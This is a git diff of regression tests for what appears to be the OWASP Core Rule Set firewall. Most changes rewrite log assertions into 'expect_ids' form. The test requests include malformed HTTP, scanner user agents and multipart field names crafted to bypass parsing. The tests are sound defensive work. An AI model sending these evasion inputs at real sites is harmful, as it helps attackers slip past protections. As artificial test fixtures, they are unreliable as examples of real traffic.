expect_ids: [] status: 505 - expect_error: false - rule_id: 932200 test_ids: [13] reason: "TODO: the log file contains MATCHED_VAR instead of the macro expansion result" output: - expect_error: true - rule_id: 933110 test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27] reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" output: log: - expect_ids: [] - expect_error: false + no_expect_ids: [9331110] - rule_id: 934131 test_ids: [5] reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml index e66fd8cc6..371b6ea40 100644 --- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml +++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml @@ -1,7 +1,6 @@ --- meta: author: "csanders-git, azurit" - description: "Description" rule_id: 911100 tests: - test_id: 1 @@ -17,7 +16,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 2 stages: - input: @@ -31,7 +31,8 @@ tests: uri: "/options" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 3 stages: - input: @@ -45,7 +46,8 @@ tests: uri: "/head" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 4 stages: - input: @@ -61,7 +63,8 @@ tests: data: "test=value" version: "HTTP/1.1" output: - no_log_contains: "id \"911100\"" + log: + no_expect_ids: [911100] - test_id: 5 stages: - input: @@ -75,7 +78,8 @@ tests: uri: "/test" version: "HTTP/1.1" output: - log_contains: "id \"911100\"" + log: + expect_ids: [911100] - test_id: 6 desc: Method is not allowed by policy (911100) from old modsec regressions stages: @@ -94,7 +98,8 @@ tests: uri: "/delete" version: HTTP/1.0 output: - log_contains: id "911100" + log: + expect_ids: [911100] - test_id: 7 desc: Method is not allowed by policy (911100) from old modsec regressions stages: @@ -113,7 +118,8 @@ tests: uri: "/foo" version: HTTP/1.0 output: - log_contains: id "911100" + log: + expect_ids: [911100] - test_id: 8 desc: Method is not allowed by policy (911100) from old modsec regressions stages: @@ -132,4 +138,5 @@ tests: uri: "/subscribe" version: HTTP/1.0 output: - log_contains: id "911100" + log: + expect_ids: [911100] diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index eec82c958..573fce3c6 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -21,7 +21,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 2 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: @@ -40,7 +41,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 3 desc: Request Indicates a Security Scanner Scanned the Site (913100) stages: @@ -59,7 +61,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 4 desc: "Scanner identification based on User-agent field" stages: @@ -74,7 +77,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 5 desc: "YUM package manager allow list" stages: @@ -89,7 +93,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "913100" + log: + no_expect_ids: [913100] - test_id: 6 desc: "ZGrab" stages: @@ -104,7 +109,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - log_contains: id "913100" + log: + expect_ids: [913100] - test_id: 7 desc: "eCairn allow list" stages: @@ -119,4 +125,5 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: id "913100" + log: + no_expect_ids: [913100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 01a8b318e..3dc6d556b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -18,7 +18,8 @@ tests: uri: "/get" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 2 desc: | Request has tab (\t) before request method - Apache complains @@ -50,7 +51,8 @@ tests: uri: "*" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 4 desc: Valid CONNECT stages: @@ -66,7 +68,8 @@ tests: version: "HTTP/1.1" output: status: 200 - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 5 desc: invalid Connect request, domains require ports stages: @@ -96,7 +99,8 @@ tests: uri: "www.coreruleset.org:80" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 7 desc: Valid request with query and anchor components stages: @@ -111,10 +115,11 @@ tests: uri: "/get/index.html?I=Like&Apples=Today#tag" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 8 desc: | - The colon in the path is not allowed. Apache will block by default + The colon in the path is not allowed. Apache will block by default: (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file stages: - input: @@ -143,7 +148,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920100\"" + log: + no_expect_ids: [920100] - test_id: 10 desc: An invalid method with a long name stages: @@ -158,12 +164,13 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920100\"" + log: + expect_ids: [920100] - test_id: 11 desc: | - An invalid request because a backslash is used in uri + An invalid request because a backslash is used in URI. Apache will end up blocking this before it gets to CRS. - We will need to support OR output tests to fix this + We will need to support OR output tests to fix this. stages: - input: dest_addr: "127.0.0.1" @@ -226,7 +233,8 @@ tests: uri: "/get" version: HTTP/1.0 output: - log_contains: id "920100" + log: + expect_ids: [920100] - test_id: 15 desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/ stages: @@ -256,4 +264,5 @@ tests: uri: "http://localhost" version: "HTTP/1.1" output: - log_contains: "id \"920100\"" + log: + expect_ids: [920100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml index 63709a82c..69d2d96be 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920120.yaml @@ -28,7 +28,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: id "920120" + log: + expect_ids: [920120] - test_id: 2 desc: Attempted multipart/form-data bypass (920120) from old modsec regressions stages: @@ -62,7 +63,8 @@ tests: Contact info. -----------------------------627652292512397580456702590-- output: - log_contains: id "920120" + log: + expect_ids: [920120] - test_id: 3 desc: Invalid Request Body (920120) from old modsec regressions stages: @@ -98,7 +100,8 @@ tests: Submit -----------------------------265001916915724-- output: - log_contains: id "920120" + log: + expect_ids: [920120] - test_id: 4 desc: Attempted multipart/form-data bypass (920120). Negative test. stages: @@ -117,11 +120,12 @@ tests: Content-Disposition: form-data; name="file"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 5 desc: Attempted multipart/form-data bypass (920120). stages: @@ -140,11 +144,12 @@ tests: Content-Disposition: form-data; name=";zzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 6 desc: Attempted multipart/form-data bypass (920120). stages: @@ -163,11 +168,12 @@ tests: Content-Disposition: form-data; name="amp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 7 desc: Attempted multipart/form-data bypass (920120). stages: @@ -186,11 +192,12 @@ tests: Content-Disposition: form-data; name="mp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 8 desc: Attempted multipart/form-data bypass (920120). stages: @@ -209,11 +216,12 @@ tests: Content-Disposition: form-data; name="p;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 9 desc: Attempted multipart/form-data bypass (920120). stages: @@ -232,11 +240,12 @@ tests: Content-Disposition: form-data; name="Zamp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 10 desc: Attempted multipart/form-data bypass (920120). stages: @@ -255,11 +264,12 @@ tests: Content-Disposition: form-data; name="Zmp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 11 desc: Attempted multipart/form-data bypass (920120). stages: @@ -278,11 +288,12 @@ tests: Content-Disposition: form-data; name="Zp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 12 desc: Attempted multipart/form-data bypass (920120). stages: @@ -301,11 +312,12 @@ tests: Content-Disposition: form-data; name="Z;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 13 desc: Attempted multipart/form-data bypass (920120). stages: @@ -324,11 +336,12 @@ tests: Content-Disposition: form-data; name="ZZZamp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 14 desc: Attempted multipart/form-data bypass (920120). stages: @@ -347,11 +360,12 @@ tests: Content-Disposition: form-data; name="ZZZmp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 15 desc: Attempted multipart/form-data bypass (920120). stages: @@ -370,11 +384,12 @@ tests: Content-Disposition: form-data; name="ZZZp;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 16 desc: Attempted multipart/form-data bypass (920120). stages: @@ -393,11 +408,12 @@ tests: Content-Disposition: form-data; name="ZZZ;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 17 desc: Attempted multipart/form-data bypass (920120). stages: @@ -416,11 +432,12 @@ tests: Content-Disposition: form-data; name="mZ;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 18 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouy]uml;.' stages: @@ -439,11 +456,12 @@ tests: Content-Disposition: form-data; name="zzzäëïöüÿÄËÏÖÜŸzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 19 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouy]uml;' stages: @@ -462,11 +480,12 @@ tests: Content-Disposition: form-data; name="äëïöüÿÄËÏÖÜŸzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 20 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeioucghjswy]circ;.' stages: @@ -485,11 +504,12 @@ tests: Content-Disposition: form-data; name="zzzâêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 21 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeioucghjswy]circ;' stages: @@ -508,11 +528,12 @@ tests: Content-Disposition: form-data; name="âêîôûĉĝĥĵŝŵŷÂÊÎÔÛĈĜĤĴŜŴŶzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 22 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiouclnrszg]acute;.' stages: @@ -531,11 +552,12 @@ tests: Content-Disposition: form-data; name="zzzáéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 23 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiouclnrszg]acute;' stages: @@ -554,11 +576,12 @@ tests: Content-Disposition: form-data; name="áéíóúćĺńŕśźǵÁÉÍÓÚĆĹŃŔŚŹ&Gacute;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 24 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[aeiou]grave;.' stages: @@ -577,11 +600,12 @@ tests: Content-Disposition: form-data; name="zzzàèìòùÀÈÌÒÙzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 25 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[aeiou]grave;' stages: @@ -600,11 +624,12 @@ tests: Content-Disposition: form-data; name="àèìòùÀÈÌÒÙzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 26 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cgklnrst]cedil;.' stages: @@ -623,11 +648,12 @@ tests: Content-Disposition: form-data; name="zzzç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 27 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cgklnrst]cedil;' stages: @@ -646,11 +672,12 @@ tests: Content-Disposition: form-data; name="ç&gcedil;ķļņŗşţÇĢĶĻŅŖŞŢzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 28 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[anoi]tilde;.' stages: @@ -669,11 +696,12 @@ tests: Content-Disposition: form-data; name="zzzãñõĩÃÑÕĨzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 29 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[anoi]tilde;' stages: @@ -692,11 +720,12 @@ tests: Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 30 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.' stages: @@ -715,11 +744,12 @@ tests: Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 31 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;' stages: @@ -738,11 +768,12 @@ tests: Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 32 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.' stages: @@ -761,11 +792,12 @@ tests: Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 33 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: @@ -784,11 +816,12 @@ tests: Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 34 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.' stages: @@ -807,11 +840,12 @@ tests: Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 35 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: @@ -830,11 +864,12 @@ tests: Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 36 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES." stages: @@ -853,11 +888,12 @@ tests: Content-Disposition: form-data; name="&fi;zzz"; filename="test" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 37 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES." stages: @@ -876,11 +912,12 @@ tests: Content-Disposition: form-data; name="test"; filename="&fi;zzz" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + expect_ids: [920120] - test_id: 38 desc: "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES." stages: @@ -899,11 +936,12 @@ tests: Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] - test_id: 39 desc: "Attempted multipart/form-data bypass (920120). Allow empty fields." stages: @@ -922,8 +960,9 @@ tests: Content-Disposition: form-data; name=""; filename="" Content-Type: application/octet-stream - helloworld - -----------------------------265001916915724-- - version: "HTTP/1.1" - output: - no_log_contains: id "920120" + helloworld + -----------------------------265001916915724-- + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920120] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml index 8deb3dc62..7b8191f98 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml @@ -25,7 +25,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 2 stages: - input: @@ -47,7 +48,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 3 stages: - input: @@ -69,7 +71,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 4 stages: - input: @@ -91,7 +94,8 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - log_contains: "id \"920121\"" + log: + expect_ids: [920121] - test_id: 5 stages: - input: @@ -113,4 +117,5 @@ tests: ----------397236876-- version: "HTTP/1.1" output: - no_log_contains: "id \"920121\"" + log: + no_expect_ids: [920121] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index ac93c5db0..aa61ceb50 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml @@ -4,8 +4,8 @@ meta: description: "Tests to trigger rule 920160" rule_id: 920160 tests: - - # Non digit Content-Length without content-type - test_id: 1 + - test_id: 1 + desc: Non digit Content-Length without content-type stages: - input: dest_addr: "127.0.0.1" @@ -20,8 +20,8 @@ tests: version: "HTTP/1.1" output: status: 400 - - # Non digit content-length with content-type - test_id: 2 + - test_id: 2 + desc: Non digit content-length with content-type stages: - input: dest_addr: "127.0.0.1" @@ -37,8 +37,8 @@ tests: version: "HTTP/1.1" output: status: 400 - - # Mixed digit and non digit content length - test_id: 3 + - test_id: 3 + desc: Mixed digit and non digit content length stages: - input: dest_addr: "127.0.0.1" @@ -54,10 +54,11 @@ tests: version: "HTTP/1.1" output: status: 400 - - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post - # Apache auto corrects for this error now so the log should not contain anything - test_id: 4 - desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions + - test_id: 4 + desc: | + Content-Length HTTP header is not numeric (920160) from old modsec regressions + Test is based in httpbin.org, so backend returns 405 if you are not posting to /post + Apache auto corrects for this error now so the log should not contain anything stages: - input: dest_addr: 127.0.0.1 @@ -77,7 +78,8 @@ tests: data: abc output: status: 200 - no_log_contains: id "920160" + log: + no_expect_ids: [920160] - test_id: 5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: @@ -99,4 +101,3 @@ tests: data: abc output: status: 400 - # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml index a8b9a1090..a8f4b8942 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml @@ -4,8 +4,8 @@ meta: description: "A Selection of tests to trigger rule 920170" rule_id: 920170 tests: - - # POST Request with data (valid) - test_id: 1 + - test_id: 1 + desc: POST Request with data (valid) stages: - input: dest_addr: "127.0.0.1" @@ -20,9 +20,10 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920170\"" - - # GET request with data - test_id: 2 + log: + no_expect_ids: [920170] + - test_id: 2 + desc: GET request with data stages: - input: dest_addr: "127.0.0.1" @@ -37,9 +38,10 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920170\"" - - # Head Request with data - test_id: 3 + log: + expect_ids: [920170] + - test_id: 3 + desc: Head Request with data stages: - input: dest_addr: "127.0.0.1" @@ -54,10 +56,12 @@ tests: uri: "/" version: "HTTP/1.1" output: - log_contains: "id \"920170\"" - - # GET Request but content length is 0 and data is provided - # Weird HTTP 1.0 support bug in Apache, without newline causes 408 - test_id: 4 + log: + expect_ids: [920170] + - test_id: 4 + desc: | + GET Request but content length is 0 and data is provided. + Weird HTTP 1.0 support bug in Apache, without newline causes 408 stages: - input: dest_addr: "127.0.0.1" @@ -70,13 +74,14 @@ tests: Content-Length: "0" Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 data: "hi=test\r\n" - stop_magic: true uri: "/" version: "HTTP/1.1" + autocomplete_headers: false output: - no_log_contains: "id \"920170\"" - - # GET request with content length 0 and no data. - test_id: 5 + log: + no_expect_ids: [920170] + - test_id: 5 + desc: GET request with content length 0 and no data. stages: - input: dest_addr: "127.0.0.1" @@ -92,7 +97,8 @@ tests: uri: "/" version: "HTTP/1.1" output: - no_log_contains: "id \"920170\"" + log: + no_expect_ids: [920170] - test_id: 6 desc: GET or HEAD Request with Body Content (920170) from old modsec regressions stages: @@ -112,4 +118,5 @@ tests: data: abc version: "HTTP/1.1" output: - log_contains: id "920170" + log: + expect_ids: [920170] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index c66ae836a..e1e68b7d8 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml @@ -25,7 +25,8 @@ tests: # encoded_request: "UE9TVCAvIEhUVFAvMS4xDQpBY2NlcHQ6ICovKg0KSG9zdDogbG9jYWxob3N0DQpUcmFuc2Zlci1FbmNvZGluZzogY2h1bmtlZA0KVXNlci1BZ2VudDogTW9kU2VjdXJpdHkgQ1JTIDMgVGVzdHMNCg0KMw0KSGkgDQozDQpDUlMNCjANCg0K" output: - no_log_contains: "id \"920171\"" + log: + no_expect_ids: [920171] - # GET Request with chunked data (invalid) test_id: 2 stages: @@ -47,7 +48,8 @@ tests: # encoded_request: 